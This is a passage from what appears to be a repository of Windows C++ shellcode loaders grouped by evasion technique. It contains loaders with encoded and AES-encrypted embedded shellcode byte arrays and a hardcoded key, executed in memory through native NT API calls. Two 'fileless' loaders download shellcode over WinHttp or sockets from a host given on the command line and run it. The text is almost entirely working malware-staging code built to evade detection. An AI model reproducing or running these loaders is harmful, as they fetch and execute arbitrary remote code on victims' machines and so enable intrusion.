0xe, 0x49, 0x46, 0x8c, 0x42, 0x1d, 0x4b, 0x2, 0xd2, 0x42, 0x8d, 0x5, 0x8a, 0x49, 0x3, 0xd1, 0x43, 0x59, 0x43, 0x59, 0x60, 0x5a, 0x5c, 0x42, 0x5a, 0x42, 0x5b, 0x42, 0x5c, 0x49, 0x85, 0xed, 0x22, 0x42, 0x54, 0x100, 0xe2, 0x59, 0x43, 0x5a, 0x5c, 0x49, 0x8d, 0x13, 0xeb, 0x58, 0x101, 0x100, 0x101, 0x5e, 0x4b, 0xbf, 0x79, 0x74, 0x34, 0x60, 0x35, 0x33, 0x2, 0x1, 0x43, 0x57, 0x4b, 0x8a, 0xe8, 0x49, 0x83, 0xed, 0xa2, 0x2, 0x2, 0x1, 0x4b, 0x8a, 0xe7, 0x4a, 0xbe, 0x3, 0x2, 0x5, 0xd4, 0x65, 0x5d, 0xb1, 0xf, 0x42, 0x56, 0x4a, 0x8b, 0xe5, 0x4e, 0x8a, 0xf3, 0x42, 0xbc, 0x4d, 0x79, 0x27, 0x9, 0x100, 0xd7, 0x4d, 0x8b, 0xeb, 0x6a, 0x2, 0x3, 0x1, 0x2, 0x5a, 0x43, 0xbb, 0x2b, 0x81, 0x6d, 0x1, 0x101, 0xd6, 0x52, 0x51, 0x4f, 0x32, 0xcb, 0x4e, 0x33, 0xc1, 0x4a, 0x100, 0xc2, 0x49, 0x8b, 0xc3, 0x4a, 0x100, 0xc2, 0x49, 0x8b, 0xc2, 0x43, 0xbb, 0xec, 0x10, 0xe1, 0xe1, 0x101, 0xd6, 0x4a, 0x8a, 0xc9, 0x6b, 0x12, 0x42, 0x5a, 0x4d, 0x8b, 0xe3, 0x4a, 0x8a, 0xfb, 0x42, 0xbc, 0x9a, 0xa7, 0x75, 0x63, 0x100, 0xd7, 0x49, 0x83, 0xc5, 0x42, 0x3, 0x2, 0x1, 0x4b, 0xb9, 0x65, 0x6e, 0x66, 0x1, 0x2, 0x1, 0x2, 0x1, 0x43, 0x51, 0x43, 0x51, 0x4a, 0x8a, 0xe4, 0x58, 0x59, 0x58, 0x4f, 0x32, 0xc2, 0x6b, 0xf, 0x5a, 0x43, 0x51, 0xe4, 0xfd, 0x68, 0xc8, 0x46, 0x25, 0x56, 0x2, 0x3, 0x49, 0x8f, 0x45, 0x26, 0x19, 0xc8, 0x1, 0x6a, 0x49, 0x8b, 0xe7, 0x58, 0x51, 0x43, 0x51, 0x43, 0x51, 0x43, 0x51, 0x4b, 0x100, 0xc2, 0x42, 0x52, 0x4a, 0x101, 0xc9, 0x4f, 0x8a, 0xc3, 0x4d, 0x8b, 0xc2, 0x43, 0xbb, 0x7b, 0xcd, 0x41, 0x87, 0x101, 0xd6, 0x4a, 0x32, 0xd4, 0x49, 0x101, 0xcb, 0x8d, 0xf, 0x43, 0xbb, 0xa, 0x88, 0x1f, 0x61, 0x101, 0xd6, 0xbd, 0xe1, 0x1f, 0x2b, 0xc, 0x42, 0xbc, 0xa7, 0x97, 0xbe, 0x9f, 0x100, 0xd7, 0x49, 0x85, 0xc5, 0x2a, 0x3d, 0x8, 0x7d, 0xc, 0x81, 0xfd, 0xe1, 0x77, 0x6, 0xbd, 0x48, 0x15, 0x73, 0x71, 0x6b, 0x2, 0x5a, 0x43, 0x8a, 0xdc, 0x100, 0xd7 };
8 | DWORD payloadLen = sizeof(payload);
9 |
10 | void Decode(unsigned char* payload) {
11 | for (int i = 0; i < payloadLen; i++) {
12 | if (i % 2 == 0) {
13 | payload[i]--;
14 | }
15 | else {
16 | payload[i] -= 2;
17 | }
18 | }
19 | }
20 |
21 | int main() {
22 |
23 | LPVOID alloc_mem = VirtualAlloc(NULL, payloadLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
24 | if (!alloc_mem) {
25 | printf("Failed to Allocate memory (%u)\n", GetLastError());
26 | return -1;
27 | }
28 |
29 | Decode(payload);
30 |
31 | /*
32 | printf("\n[+] After Decode:\n");
33 | for (int i = 0; i < payloadLen; i++) {
34 | printf("%2x ,", payload[i]);
35 | }
36 | */
37 | CopyMemory(alloc_mem, payload, payloadLen);
38 |
39 | DWORD OldProtect;
40 | if (!VirtualProtect(alloc_mem, payloadLen, PAGE_EXECUTE_READ, &OldProtect)) {
41 | printf("Failed to Change memory protection (%u)\n", GetLastError());
42 | return -2;
43 | }
44 |
45 | HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);
46 | if (!tHandle) {
47 | printf("Failed to create the Thread (%u)\n", GetLastError());
48 | return -3;
49 | }
50 | WaitForSingleObject(tHandle, INFINITE);
51 |
52 | return 0;
53 | }
--------------------------------------------------------------------------------
/3 - Encrypting/1 - AES/AES/AES.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #pragma comment (lib, "crypt32.lib")
5 |
6 | #pragma comment(lib, "ntdll")
7 |
8 | #define NtCurrentProcess() ((HANDLE)-1)
9 | #define DEFAULT_BUFLEN 4096
10 |
11 | #ifndef NT_SUCCESS
12 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
13 | #endif
14 |
15 | EXTERN_C NTSTATUS NtAllocateVirtualMemory(
16 | HANDLE ProcessHandle,
17 | PVOID* BaseAddress,
18 | ULONG_PTR ZeroBits,
19 | PSIZE_T RegionSize,
20 | ULONG AllocationType,
21 | ULONG Protect
22 | );
23 |
24 | EXTERN_C NTSTATUS NtProtectVirtualMemory(
25 | IN HANDLE ProcessHandle,
26 | IN OUT PVOID* BaseAddress,
27 | IN OUT PSIZE_T RegionSize,
28 | IN ULONG NewProtect,
29 | OUT PULONG OldProtect);
30 |
31 | EXTERN_C NTSTATUS NtCreateThreadEx(
32 | OUT PHANDLE hThread,
33 | IN ACCESS_MASK DesiredAccess,
34 | IN PVOID ObjectAttributes,
35 | IN HANDLE ProcessHandle,
36 | IN PVOID lpStartAddress,
37 | IN PVOID lpParameter,
38 | IN ULONG Flags,
39 | IN SIZE_T StackZeroBits,
40 | IN SIZE_T SizeOfStackCommit,
41 | IN SIZE_T SizeOfStackReserve,
42 | OUT PVOID lpBytesBuffer
43 | );
44 |
45 | EXTERN_C NTSTATUS NtWaitForSingleObject(
46 | IN HANDLE Handle,
47 | IN BOOLEAN Alertable,
48 | IN PLARGE_INTEGER Timeout
49 | );
50 |
51 |
52 |
53 | void DecryptAES(char* shellcode, DWORD shellcodeLen, char* key, DWORD keyLen) {
54 | HCRYPTPROV hProv;
55 | HCRYPTHASH hHash;
56 | HCRYPTKEY hKey;
57 |
58 | if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
59 | printf("Failed in CryptAcquireContextW (%u)\n", GetLastError());
60 | return;
61 | }
62 | if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
63 | printf("Failed in CryptCreateHash (%u)\n", GetLastError());
64 | return;
65 | }
66 | if (!CryptHashData(hHash, (BYTE*)key, keyLen, 0)) {
67 | printf("Failed in CryptHashData (%u)\n", GetLastError());
68 | return;
69 | }
70 | if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
71 | printf("Failed in CryptDeriveKey (%u)\n", GetLastError());
72 | return;
73 | }
74 |
75 | if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)shellcode, &shellcodeLen)) {
76 | printf("Failed in CryptDecrypt (%u)\n", GetLastError());
77 | return;
78 | }
79 |
80 | CryptReleaseContext(hProv, 0);
81 | CryptDestroyHash(hHash);
82 | CryptDestroyKey(hKey);
83 |
84 | }
85 |
86 |
87 | int main(int argc, char** argv) {
88 |
89 | char AESkey[] = { 0x64, 0xb5, 0x31, 0xfe, 0xb3, 0x6b, 0xb3, 0x8c, 0x88, 0x6a, 0x4c, 0x38, 0xc, 0xcb, 0x19, 0x4a };
90 | unsigned char AESshellcode[] = { 0x8, 0x21, 0x22, 0xeb, 0xfa, 0xdb, 0x42, 0x9, 0x8e, 0x24, 0xb6, 0x10, 0xfb, 0x93, 0x5b, 0xfe, 0xc3, 0x9d, 0x75, 0x68, 0xcc, 0x35, 0xd0, 0xef, 0xfd, 0x23, 0x70, 0xe3, 0x1, 0x3d, 0x8f, 0xd0, 0xe6, 0x5b, 0x97, 0x5e, 0x79, 0x78, 0x55, 0xf9, 0xaf, 0x71, 0x67, 0x78, 0x3c, 0xd9, 0x4a, 0xe7, 0x81, 0xc, 0xe5, 0x50, 0x46, 0x47, 0xa, 0x2e, 0x79, 0x5b, 0x6f, 0x43, 0x4d, 0x10, 0x2d, 0x35, 0x93, 0x94, 0xdd, 0x8f, 0x36, 0x2d, 0x3, 0xed, 0x9, 0x33, 0xed, 0xe3, 0xe1, 0x43, 0x17, 0xb6, 0xff, 0xe9, 0x69, 0x33, 0x1c, 0x81, 0x83, 0xb, 0xbf, 0x13, 0x1c, 0x25, 0xd5, 0x2f, 0xb8, 0x90, 0x6d, 0x1e, 0xd3, 0x11, 0xd, 0x29, 0xf7, 0x13, 0xde, 0x7e, 0x71, 0x53, 0x7, 0x44, 0xf3, 0xf6, 0xf6, 0xc3, 0x54, 0xb3, 0xaa, 0xe1, 0xd6, 0xbf, 0x1e, 0xa, 0x9c, 0x25, 0x72, 0x9e, 0x8b, 0x54, 0x62, 0x1c, 0xd9, 0x72, 0xab, 0xbd, 0x30, 0x47, 0x65, 0xd2, 0x0, 0x45, 0xb, 0xc4, 0x16, 0xbb, 0x80, 0xf, 0xd4, 0x0, 0x22, 0x40, 0xd3, 0x4d, 0xbb, 0x3f, 0x64, 0xe1, 0xa8, 0x2a, 0x60, 0x1e, 0xd1, 0x0, 0xd9, 0xb3, 0x46, 0xb6, 0x1c, 0xd0, 0xe2, 0xe1, 0x7d, 0x99, 0x9f, 0x8a, 0x70, 0xd5, 0x7d, 0x9c, 0x88, 0xd, 0x2d, 0xbb, 0x4c, 0x2a, 0x3f, 0xeb, 0xfd, 0xdd, 0xad, 0x8f, 0xba, 0xcc, 0x87, 0x3, 0xcf, 0x8f, 0x15, 0x54, 0xc5, 0xc1, 0xa2, 0xcb, 0x9b, 0x14, 0xae, 0xcb, 0x8, 0xf, 0x5a, 0xae, 0x6d, 0x63, 0xf3, 0x82, 0xe2, 0xec, 0x79, 0xe0, 0x1c, 0xb1, 0x85, 0xa9, 0x22, 0xb0, 0x66, 0xe9, 0x73, 0xbe, 0xdc, 0xac, 0xdc, 0x7d, 0x2e, 0xac, 0x5d, 0x29, 0x23, 0x44, 0x11, 0xee, 0xbf, 0xc9, 0x60, 0xa2, 0x1e, 0x7, 0x6d, 0x9e, 0x56, 0xf2, 0xb4, 0x2a, 0xb6, 0x83, 0x4, 0xca, 0x7e, 0xcb, 0x7e, 0x63, 0x8a, 0x70, 0xa1, 0xe5, 0x1f, 0x6f, 0xa, 0x21, 0x2e, 0x5b, 0x4c, 0x6a, 0x62, 0x84, 0x70, 0x33, 0x84, 0xca, 0x48, 0x39, 0x6b, 0x64, 0xc6, 0x4, 0xc6, 0x6f, 0xe2, 0x6d, 0x29, 0xda, 0x78, 0x64, 0x59, 0x13, 0xfe, 0x2, 0x3, 0xd9, 0xe, 0x7e, 0x97, 0x10, 0x7c, 0xbd, 0x9a, 0xf1, 0xbf, 0xce, 0x4e, 0x4, 0xf1, 0x93, 0x25, 0x88, 0x52, 0x99, 0x44, 0xbd, 0x52, 0x7c, 0xfe, 0x2c, 0xdb, 0x50, 0x9, 0x3b, 0x2a, 0xd, 0x30, 0x73, 0x3c, 0x8c, 0xee, 0xec, 0xb8, 0xc8, 0xe3, 0x3d, 0x48, 0xed, 0xc0, 0x4b, 0xd1, 0x8d, 0x48, 0x0, 0x3, 0xd8, 0xc, 0xde, 0x69, 0xf9, 0xe, 0xda, 0x31, 0xfe, 0xb6, 0x77, 0xc4, 0x4d, 0x31, 0x25, 0xc5, 0xd1, 0xa1, 0x11, 0x22, 0x15, 0x8, 0xc7, 0xa5, 0x73, 0x19, 0x3a, 0x87, 0x5, 0xcc, 0x37, 0x34, 0xad, 0x8a, 0xfa, 0xae, 0x6b, 0xf8, 0x38, 0x4a, 0x5, 0x2e, 0x74, 0xda, 0x77, 0x2a, 0xa0, 0x4f, 0xab, 0xcd, 0xbb, 0x2e, 0x2f, 0xb8, 0xf7, 0xa1, 0x91, 0x8e, 0x42, 0x43, 0x85, 0xa, 0x6b, 0xfd, 0x6d, 0x37, 0xd8, 0xa, 0x53, 0x9f, 0x54, 0x49, 0x26, 0x2a, 0x6d, 0x9e, 0x85, 0x30, 0xe5, 0xc7, 0x91, 0x80, 0x75, 0x79, 0xc1, 0x2a, 0x87, 0xc9, 0xd0, 0x47, 0xdd, 0xc3, 0x9f, 0x66, 0xf0, 0x23, 0xf1, 0xa2, 0x4, 0x7e, 0xf1, 0xd7, 0x28, 0x1d, 0x3b, 0xcd, 0x2, 0x7, 0xc, 0x72, 0x37, 0x94, 0xa6, 0x1b, 0x5c, 0x6d, 0x41 };
91 |
92 | DWORD payload_length = sizeof(AESshellcode);
93 |
94 | PVOID BaseAddress = NULL;
95 | SIZE_T dwSize = 0x2000;
96 |
97 | NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress, 0, &dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
98 | if (!NT_SUCCESS(status1)) {
99 | return 1;
100 | }
101 |
102 | // Decrypt the AES payload to Original Shellcode
103 | DecryptAES((char*)AESshellcode, payload_length, AESkey, sizeof(AESkey));
104 |
105 |
106 | RtlMoveMemory(BaseAddress, AESshellcode, sizeof(AESshellcode));
107 |
108 | HANDLE hThread;
109 | DWORD OldProtect = 0;
110 |
111 | NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, (PSIZE_T)&dwSize, PAGE_EXECUTE_READ, &OldProtect);
112 | if (!NT_SUCCESS(NtProtectStatus1)) {
113 | return 2;
114 | }
115 |
116 |
117 | HANDLE hHostThread = INVALID_HANDLE_VALUE;
118 |
119 | NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
120 | if (!NT_SUCCESS(NtCreateThreadstatus)) {
121 | printf("[!] Failed in sysNtCreateThreadEx (%u)\n", GetLastError());
122 | return 3;
123 | }
124 |
125 | LARGE_INTEGER Timeout;
126 | Timeout.QuadPart = -10000000;
127 |
128 |
129 | NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout);
130 | if (!NT_SUCCESS(NTWFSOstatus)) {
131 | printf("[!] Failed in sysNtWaitForSingleObject (%u)\n", GetLastError());
132 | return 4;
133 | }
134 |
135 | return 0;
136 | }
137 |
138 |
139 |
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/2 - Using WinHttp/WinhttpShellcode/WinhttpShellcode.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 |
7 | #pragma comment(lib, "ntdll")
8 | #pragma comment(lib, "winhttp")
9 |
10 | #pragma warning (disable: 4996)
11 | #define _CRT_SECURE_NO_WARNINGS
12 |
13 |
14 | #define NtCurrentProcess() ((HANDLE)-1)
15 | #define DEFAULT_BUFLEN 4096
16 |
17 | #ifndef NT_SUCCESS
18 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
19 | #endif
20 |
21 | EXTERN_C NTSTATUS NtAllocateVirtualMemory(
22 | HANDLE ProcessHandle,
23 | PVOID* BaseAddress,
24 | ULONG_PTR ZeroBits,
25 | PSIZE_T RegionSize,
26 | ULONG AllocationType,
27 | ULONG Protect
28 | );
29 |
30 | EXTERN_C NTSTATUS NtProtectVirtualMemory(
31 | IN HANDLE ProcessHandle,
32 | IN OUT PVOID* BaseAddress,
33 | IN OUT PSIZE_T RegionSize,
34 | IN ULONG NewProtect,
35 | OUT PULONG OldProtect);
36 |
37 | EXTERN_C NTSTATUS NtCreateThreadEx(
38 | OUT PHANDLE hThread,
39 | IN ACCESS_MASK DesiredAccess,
40 | IN PVOID ObjectAttributes,
41 | IN HANDLE ProcessHandle,
42 | IN PVOID lpStartAddress,
43 | IN PVOID lpParameter,
44 | IN ULONG Flags,
45 | IN SIZE_T StackZeroBits,
46 | IN SIZE_T SizeOfStackCommit,
47 | IN SIZE_T SizeOfStackReserve,
48 | OUT PVOID lpBytesBuffer
49 | );
50 |
51 | EXTERN_C NTSTATUS NtWaitForSingleObject(
52 | IN HANDLE Handle,
53 | IN BOOLEAN Alertable,
54 | IN PLARGE_INTEGER Timeout
55 | );
56 |
57 |
58 | void RunShellcode(char* shellcode, DWORD shellcodeLen) {
59 | PVOID BaseAddress = NULL;
60 | SIZE_T dwSize2 = 0x2000;
61 |
62 | PCSTR Terminator = NULL;
63 | NTSTATUS STATUS;
64 |
65 | NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress, 0, &dwSize2, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
66 | if (!NT_SUCCESS(status1)) {
67 | return ;
68 | }
69 |
70 |
71 | RtlMoveMemory(BaseAddress, shellcode, shellcodeLen);
72 |
73 |
74 |
75 | HANDLE hThread;
76 | DWORD OldProtect = 0;
77 |
78 | NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, &dwSize2, PAGE_EXECUTE_READ, &OldProtect);
79 | if (!NT_SUCCESS(NtProtectStatus1)) {
80 | return;
81 | }
82 |
83 | printf("\n\nShellcode_mem : %p\n\n", BaseAddress);
84 |
85 | getchar();
86 |
87 | HANDLE hHostThread = INVALID_HANDLE_VALUE;
88 |
89 |
90 | NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
91 | if (!NT_SUCCESS(NtCreateThreadstatus)) {
92 | printf("[!] Failed in sysNtCreateThreadEx (%u)\n", GetLastError());
93 | return;
94 | }
95 |
96 | LARGE_INTEGER Timeout;
97 | Timeout.QuadPart = -10000000;
98 |
99 |
100 | NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout);
101 | if (!NT_SUCCESS(NTWFSOstatus)) {
102 | printf("[!] Failed in sysNtWaitForSingleObject (%u)\n", GetLastError());
103 | return;
104 | }
105 | }
106 |
107 | void getShellcode_Run(wchar_t* whost, DWORD port, wchar_t* wresource) {
108 | DWORD dwSize = 0;
109 | DWORD dwDownloaded = 0;
110 | LPSTR pszOutBuffer = NULL;
111 | BOOL bResults = FALSE;
112 | HINTERNET hSession = NULL,
113 | hConnect = NULL,
114 | hRequest = NULL;
115 | // Use WinHttpOpen to obtain a session handle.
116 | hSession = WinHttpOpen(L"WinHTTP Example/1.0",
117 | WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
118 | WINHTTP_NO_PROXY_NAME,
119 | WINHTTP_NO_PROXY_BYPASS, 0);
120 |
121 |
122 | // Specify an HTTP server.
123 | if (hSession)
124 | hConnect = WinHttpConnect(hSession, whost,
125 | port, 0);
126 | else
127 | printf("Failed in WinHttpConnect (%u)\n", GetLastError());
128 |
129 | // Create an HTTP request handle.
130 | if (hConnect)
131 | hRequest = WinHttpOpenRequest(hConnect, L"GET", wresource,
132 | NULL, WINHTTP_NO_REFERER,
133 | WINHTTP_DEFAULT_ACCEPT_TYPES,
134 | NULL);
135 | else
136 | printf("Failed in WinHttpOpenRequest (%u)\n", GetLastError());
137 |
138 | // Send a request.
139 | if (hRequest)
140 | bResults = WinHttpSendRequest(hRequest,
141 | WINHTTP_NO_ADDITIONAL_HEADERS,
142 | 0, WINHTTP_NO_REQUEST_DATA, 0,
143 | 0, 0);
144 | else
145 | printf("Failed in WinHttpSendRequest (%u)\n", GetLastError());
146 |
147 | // End the request.
148 | if (bResults)
149 | bResults = WinHttpReceiveResponse(hRequest, NULL);
150 | else printf("Failed in WinHttpReceiveResponse (%u)\n", GetLastError());
151 |
152 | // Keep checking for data until there is nothing left.
153 | if (bResults)
154 | do
155 | {
156 | // Check for available data.
157 | dwSize = 0;
158 | if (!WinHttpQueryDataAvailable(hRequest, &dwSize))
159 | printf("Error %u in WinHttpQueryDataAvailable (%u)\n", GetLastError());
160 |
161 | // Allocate space for the buffer.
162 | pszOutBuffer = new char[dwSize + 1];
163 | if (!pszOutBuffer)
164 | {
165 | printf("Out of memory\n");
166 | dwSize = 0;
167 | }
168 | else
169 | {
170 | // Read the Data.
171 | ZeroMemory(pszOutBuffer, dwSize + 1);
172 |
173 | if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer,
174 | dwSize, &dwDownloaded))
175 | printf("Error %u in WinHttpReadData.\n", GetLastError());
176 | else {
177 |
178 | // Run the shellcode
179 | RunShellcode(pszOutBuffer, dwSize + 1);
180 |
181 | }
182 |
183 | }
184 |
185 | } while (dwSize > 0);
186 |
187 |
188 |
189 | // Report any errors.
190 | if (!bResults)
191 | printf("Error %d has occurred.\n", GetLastError());
192 |
193 | // Close any open handles.
194 | if (hRequest) WinHttpCloseHandle(hRequest);
195 | if (hConnect) WinHttpCloseHandle(hConnect);
196 | if (hSession) WinHttpCloseHandle(hSession);
197 |
198 | }
199 |
200 |
201 | int main(int argc, char** argv) {
202 |
203 | // Validate the parameters
204 | if (argc != 4) {
205 | printf("[+] Usage: %s \n", argv[0]);
206 | return 1;
207 | }
208 | char* host = argv[1];
209 | DWORD port = atoi(argv[2]);
210 | char* resource = argv[3];
211 |
212 | const size_t cSize1 = strlen(host) + 1;
213 | wchar_t* whost = new wchar_t[cSize1];
214 | mbstowcs(whost, host, cSize1);
215 |
216 |
217 | const size_t cSize2 = strlen(resource) + 1;
218 | wchar_t* wresource = new wchar_t[cSize2];
219 | mbstowcs(wresource, resource, cSize2);
220 |
221 | getShellcode_Run(whost, port, wresource);
222 |
223 | return 0;
224 |
225 | }
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/1 - Using Sockets/FilelessShellcode.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 |
6 | #pragma comment(lib, "ntdll")
7 |
8 | #pragma comment (lib, "Ws2_32.lib")
9 | #pragma comment (lib, "Mswsock.lib")
10 | #pragma comment (lib, "AdvApi32.lib")
11 |
12 |
13 | #define NtCurrentProcess() ((HANDLE)-1)
14 | #define DEFAULT_BUFLEN 4096
15 |
16 | #ifndef NT_SUCCESS
17 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
18 | #endif
19 |
20 | EXTERN_C NTSTATUS NtAllocateVirtualMemory(
21 | HANDLE ProcessHandle,
22 | PVOID* BaseAddress,
23 | ULONG_PTR ZeroBits,
24 | PSIZE_T RegionSize,
25 | ULONG AllocationType,
26 | ULONG Protect
27 | );
28 |
29 | EXTERN_C NTSTATUS NtProtectVirtualMemory(
30 | IN HANDLE ProcessHandle,
31 | IN OUT PVOID* BaseAddress,
32 | IN OUT PSIZE_T RegionSize,
33 | IN ULONG NewProtect,
34 | OUT PULONG OldProtect);
35 |
36 | EXTERN_C NTSTATUS NtCreateThreadEx(
37 | OUT PHANDLE hThread,
38 | IN ACCESS_MASK DesiredAccess,
39 | IN PVOID ObjectAttributes,
40 | IN HANDLE ProcessHandle,
41 | IN PVOID lpStartAddress,
42 | IN PVOID lpParameter,
43 | IN ULONG Flags,
44 | IN SIZE_T StackZeroBits,
45 | IN SIZE_T SizeOfStackCommit,
46 | IN SIZE_T SizeOfStackReserve,
47 | OUT PVOID lpBytesBuffer
48 | );
49 |
50 | EXTERN_C NTSTATUS NtWaitForSingleObject(
51 | IN HANDLE Handle,
52 | IN BOOLEAN Alertable,
53 | IN PLARGE_INTEGER Timeout
54 | );
55 |
56 | void RunShellcode(char* shellcode, DWORD shellcodeLen) {
57 |
58 | PVOID BaseAddress = NULL;
59 | SIZE_T dwSize = 0x2000;
60 |
61 | PCSTR Terminator = NULL;
62 | NTSTATUS STATUS;
63 |
64 | NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress, 0, &dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
65 | if (!NT_SUCCESS(status1)) {
66 | return ;
67 | }
68 |
69 | RtlMoveMemory(BaseAddress, shellcode, shellcodeLen);
70 |
71 | HANDLE hThread;
72 | DWORD OldProtect = 0;
73 |
74 | NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, (PSIZE_T)&dwSize, PAGE_EXECUTE_READ, &OldProtect);
75 | if (!NT_SUCCESS(NtProtectStatus1)) {
76 | return ;
77 | }
78 |
79 |
80 | HANDLE hHostThread = INVALID_HANDLE_VALUE;
81 |
82 |
83 | NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
84 | if (!NT_SUCCESS(NtCreateThreadstatus)) {
85 | printf("[!] Failed in sysNtCreateThreadEx (%u)\n", GetLastError());
86 | return ;
87 | }
88 |
89 | LARGE_INTEGER Timeout;
90 | Timeout.QuadPart = -10000000;
91 |
92 |
93 | NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout);
94 | if (!NT_SUCCESS(NTWFSOstatus)) {
95 | printf("[!] Failed in sysNtWaitForSingleObject (%u)\n", GetLastError());
96 | return ;
97 | }
98 | }
99 |
100 |
101 | void getShellcode_Run(char* host, char* port, char* resource) {
102 |
103 | DWORD oldp = 0;
104 | BOOL returnValue;
105 |
106 | size_t origsize = strlen(host) + 1;
107 | const size_t newsize = 100;
108 | size_t convertedChars = 0;
109 | wchar_t Whost[newsize];
110 | mbstowcs_s(&convertedChars, Whost, origsize, host, _TRUNCATE);
111 |
112 |
113 | WSADATA wsaData;
114 | SOCKET ConnectSocket = INVALID_SOCKET;
115 | struct addrinfo* result = NULL,
116 | * ptr = NULL,
117 | hints;
118 | char sendbuf[MAX_PATH] = "";
119 | lstrcatA(sendbuf, "GET /");
120 | lstrcatA(sendbuf, resource);
121 |
122 | char recvbuf[DEFAULT_BUFLEN];
123 | memset(recvbuf, 0, DEFAULT_BUFLEN);
124 | int iResult;
125 | int recvbuflen = DEFAULT_BUFLEN;
126 |
127 |
128 | // Initialize Winsock
129 | iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
130 | if (iResult != 0) {
131 | printf("WSAStartup failed with error: %d\n", iResult);
132 | return ;
133 | }
134 |
135 | ZeroMemory(&hints, sizeof(hints));
136 | hints.ai_family = PF_INET;
137 | hints.ai_socktype = SOCK_STREAM;
138 | hints.ai_protocol = IPPROTO_TCP;
139 |
140 | // Resolve the server address and port
141 | iResult = getaddrinfo(host, port, &hints, &result);
142 | if (iResult != 0) {
143 | printf("getaddrinfo failed with error: %d\n", iResult);
144 | WSACleanup();
145 | return ;
146 | }
147 |
148 | // Attempt to connect to an address until one succeeds
149 | for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {
150 |
151 | // Create a SOCKET for connecting to server
152 | ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype,
153 | ptr->ai_protocol);
154 | if (ConnectSocket == INVALID_SOCKET) {
155 | printf("socket failed with error: %ld\n", WSAGetLastError());
156 | WSACleanup();
157 | return ;
158 | }
159 |
160 | // Connect to server.
161 | printf("[+] Connect to %s:%s", host, port);
162 | iResult = connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
163 | if (iResult == SOCKET_ERROR) {
164 | closesocket(ConnectSocket);
165 | ConnectSocket = INVALID_SOCKET;
166 | continue;
167 | }
168 | break;
169 | }
170 |
171 | freeaddrinfo(result);
172 |
173 | if (ConnectSocket == INVALID_SOCKET) {
174 | printf("Unable to connect to server!\n");
175 | WSACleanup();
176 | return ;
177 | }
178 |
179 | // Send an initial buffer
180 | iResult = send(ConnectSocket, sendbuf, (int)strlen(sendbuf), 0);
181 | if (iResult == SOCKET_ERROR) {
182 | printf("send failed with error: %d\n", WSAGetLastError());
183 | closesocket(ConnectSocket);
184 | WSACleanup();
185 | return ;
186 | }
187 |
188 | printf("\n[+] Sent %ld Bytes\n", iResult);
189 |
190 | // shutdown the connection since no more data will be sent
191 | iResult = shutdown(ConnectSocket, SD_SEND);
192 | if (iResult == SOCKET_ERROR) {
193 | printf("shutdown failed with error: %d\n", WSAGetLastError());
194 | closesocket(ConnectSocket);
195 | WSACleanup();
196 | return ;
197 | }
198 |
199 | // Receive until the peer closes the connection
200 | do {
201 |
202 | iResult = recv(ConnectSocket, (char*)recvbuf, recvbuflen, 0);
203 | if (iResult > 0)
204 | printf("[+] Received %d Bytes\n", iResult);
205 | else if (iResult == 0)
206 | printf("[+] Connection closed\n");
207 | else
208 | printf("recv failed with error: %d\n", WSAGetLastError());
209 |
210 |
211 | RunShellcode(recvbuf, recvbuflen);
212 |
213 | } while (iResult > 0);
214 |
215 | // cleanup
216 | closesocket(ConnectSocket);
217 | WSACleanup();
218 | }
219 |
220 |
221 |
222 | int main(int argc, char** argv) {
223 |
224 | // Validate the parameters
225 | if (argc != 4) {
226 | printf("[+] Usage: %s \n", argv[0]);
227 | return 1;
228 | }
229 |
230 | getShellcode_Run(argv[1], argv[2], argv[3]);
231 |
232 | return 0;
233 |
234 | }
235 |
--------------------------------------------------------------------------------
/3 - Encrypting/1 - AES/AES/AES.vcxproj:
--------------------------------------------------------------------------------
1 |
